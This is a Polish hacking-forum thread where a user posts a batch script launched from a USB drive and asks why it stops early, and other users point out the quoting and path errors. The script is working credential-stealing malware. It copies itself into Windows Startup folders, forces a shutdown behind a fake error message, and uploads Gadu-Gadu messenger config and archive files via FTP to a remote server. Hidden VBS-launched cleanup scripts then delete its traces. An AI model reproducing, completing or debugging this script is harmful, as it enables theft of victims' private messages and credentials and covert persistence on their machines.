Pokaż wyniki 1 do 5 z 5

Temat: *.bat nie działa : ( wyłącza się bez powodu

 1. #1

  Domyślnie *.bat nie działa : ( wyłącza się bez powodu

  Mój skrypt FOTO.bat (uruchamiany z pendrive po odpowiednim formacie) nie chce działać wyłącza się zaraz po 4 lub 5 linii sktyptu
  (widać to jak da się pause)
  proszę o pomoc... bo nie mogę dać sobie z tym rady
  oto skrypt:
  Cz. 1- dalsza w 2 poście (limit 10 000 znaków)

  cd C:\
  cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat goto start
  if not exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat goto dalej

  :dalej
  cd C:\
  cd "%USERPROFILE%\Start Menu\Programs\Startup\"
  if exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat goto start
  if not exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat goto run

  :run

  if exist D:\FOTY.bat goto Dump
  if not exist D:\FOTY.bat goto DWA

  WA
  if exist E:\FOTY.bat goto Eump
  if not exist E:\FOTY.bat goto TRZY

  :TRZY
  if exist F:\FOTY.bat goto Fump
  if not exist F:\FOTY.bat goto CZTERY

  :CZTERY
  if exist G:\FOTY.bat goto Gump
  if not exist G:\FOTY.bat goto PIEC

  :PIEC
  if exist H:\FOTY.bat goto Hump
  if not exist H:\FOTY.bat goto SZESC

  :SZESC
  if exist I:\FOTY.bat goto Iump
  if not exist I:\FOTY.bat goto SIEDEM

  :SIEDEM
  if exist J:\FOTY.bat goto Jump
  if not exist F:\FOTY.bat goto OSIEM

  :OSIEM
  if exist K:\FOTY.bat goto Kump
  if not exist K:\FOTY.bat goto ARMAGEDDON


  ump
  cd D:\
  xcopy /Y D:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y D:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd D:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd D:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit


  :Eump
  cd E:\
  xcopy /Y E:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y E:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd E:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd E:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit


  :Fump
  cd F:\
  xcopy /Y F:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y F:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd F:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd F:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit  :Gump
  cd G:\
  xcopy /Y G:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y G:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd G:\NICK
  echo Dim oShell>>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd G:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit
  :Hump
  cd H:\
  xcopy /Y H:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y H:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd H:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd H:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit


  :Iump
  cd I:\
  xcopy /Y I:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y I:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd I:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd I:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit
  :Jump
  cd J:\
  xcopy /Y J:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y J:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd J:\NICK
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd J:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit  :Kump
  cd K:\
  xcopy /Y K:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
  xcopy /Y K:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
  shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
  cd K:\NICK
  echo Dim oShell>>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell")>>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0>>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd K:\ >>"deli.bat"
  echo :akcja >>"deli.bat"
  echo del FOTY.bat >>"deli.bat"
  echo if exist FOTY.bat goto akcja >>"deli.bat"
  echo if not exist FOTY.bat goto usun >>"deli.bat"
  echo :usun >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit  :ARMAGEDDON
  exit

 2. #2

  Domyślnie

  Cz. 2 skryptu

  :ARMAGEDDON
  exit

  :start
  cd c:\
  md "%userprofile%\SMTPS"
  cd "%userprofile%\SMTPS"
  echo user XXXXXXXXXX >>"Skrypt.txt"
  echo XXXXXX >>"Skrypt.txt"
  echo lcd "%userprofile%\Gadu-Gadu\Ja">>"skrypt.txt"
  echo cd>>"skrypt.txt"
  echo /PUBLIKACJA/GG/Ja>>"skrypt.txt"
  echo bin>>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja\config.dat">>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja\archives.dat">>"Skrypt.txt"
  echo lcd "%userprofile%\Gadu-Gadu\Ja1">>"skrypt.txt"
  echo cd>>"skrypt.txt"
  echo /PUBLIKACJA/GG/Ja1>>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja1\config.dat">>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja1\archives.dat">>"Skrypt.txt"
  echo lcd "%userprofile%\Gadu-Gadu\Ja2">>"skrypt.txt"
  echo cd>>"skrypt.txt"
  echo /PUBLIKACJA/GG/Ja2>>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja2\config.dat">>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja2\archives.dat">>"Skrypt.txt"
  echo lcd "%userprofile%\Gadu-Gadu\Ja3">>"skrypt.txt"
  echo cd>>"skrypt.txt"
  echo /PUBLIKACJA/GG/Ja3>>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja3\config.dat">>"skrypt.txt"
  echo put "%userprofile%\Gadu-Gadu\Ja3\archives.dat">>"Skrypt.txt"
  echo lcd "%userprofile%\SMTPS">>"skrypt.txt"
  echo cd>>"skrypt.txt"
  echo /PUBLIKACJA/TestFile>>"skrypt.txt"
  echo get /PUBLIKACJA/TestFile/tray.txt>>"skrypt.txt"
  echo bye>>"skrypt.txt"
  ftp -n -s:"Skrypt.txt" XXXXXXXXXXX.pl
  del "%userprofile%\SMTPS\skrypt.txt"
  echo 10101010101010101010101010101010101010101010101001 01010101010100000111101011111111111000000000000000 00000000000000000000000000000000000000000000000111 11111111111111111111111111111111111111111111111111 11111111111111111111111111110000000000000000000000 00000000000000000111111111111111111111111111111111 11111111111111111111111111111111111111111111111111 10000000000000000000000000000000000000000000000000 00000000000000000000000000000001111111111111111111 11111111111111111111111111111111111111010101010101 01010101010100101010101010100000111101011111111111 11111111111100000000000001010000000011111110000000 11111111110101000000000000000000000011111111111110 10111010101000000000000000011111111111111111110000 00000011111111000000010000000000011111111111100000 00011111110000000011111101010111010111010101000010 101101010101010100010101010 >>"zamaz.txt"
  if not exist "%userprofile%\SMTPS\tray.txt" goto start
  cd "%userprofile%\"
  echo Dim oShell >>"deli.vbs"
  echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
  echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
  echo Set oShell = Nothing >>"deli.vbs"
  echo cd "%userprofile%" >>"deli.bat"
  echo RD /S /Q "%userprofile%\SMTPS" >>"deli.bat"
  echo cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup" >>"deli.bat"
  echo del "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat >>"deli.bat"
  echo cd "%USERPROFILE%\Start Menu\Programs\Startup" >>"deli.bat"
  echo del "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat >>"deli.bat"
  echo cd "%UNSERPROILE%\" >>"deli.bat"
  echo del deli.vbs >>"deli.bat"
  echo del deli.bat >>"deli.bat"
  deli.vbs
  exit

 3. #3
  Zarejestrowany
  Mar 2010
  Skąd
  południe
  Postów
  4

  Domyślnie

  o ile mnie wzrok nie myli (późno już) pozjadałeś cudzysłowy na początku skryptu

  Kod:
  if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat" goto start
  if not exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat" goto dalej
  
  :dalej
  cd C:\
  cd "%USERPROFILE%\Start Menu\Programs\Startup\"
  if exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat" goto start
  if not exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat" goto run
  pod etykietą :dalej to samo

  Kod:
  if exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat" goto start
  if not exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat" goto run
  Ostatnio edytowane przez detune : 03-15-2010 - 13:49

 4. #4
  Zarejestrowany
  Aug 2014
  Postów
  12

  Domyślnie

  błąd w ścierzkach, bo jak jesteś w podanej ścierzce to już nie możesz jej podać jak byś był w poprzedniej... Możesz napisać tak po komędzie cd - if exist "%cd%\(dalej ścierzka do pliku)"

 5. #5

  Domyślnie

  jegor377 przez Ciebie pieka mnie oczy

Podobne wątki

 1. Proxy - dlaczego nie działa?
  By adulescens in forum Anonimowość w sieci
  Odpowiedzi: 8
  Autor: 10-15-2008, 14:50
 2. nie działa MP??
  By 4ndr1u in forum Newbie - dla początkujących!
  Odpowiedzi: 5
  Autor: 09-17-2008, 12:22
 3. Shellcode nie działa
  By Ormi in forum Assembler
  Odpowiedzi: 9
  Autor: 07-20-2008, 12:31
 4. Dlaczego nie działa??
  By Achilles1991 in forum PHP/CGI/ASP/JSP/J2EE
  Odpowiedzi: 2
  Autor: 11-25-2007, 07:19
 5. Nie działa strona internetowa
  By Piter in forum HTML/DHTML/XHTML
  Odpowiedzi: 1
  Autor: 08-05-2007, 18:16

Zasady Postowania

 • Nie możesz zakładać nowych tematów
 • Nie możesz pisać wiadomości
 • Nie możesz dodawać załączników
 • Nie możesz edytować swoich postów
 •  
Subskrybuj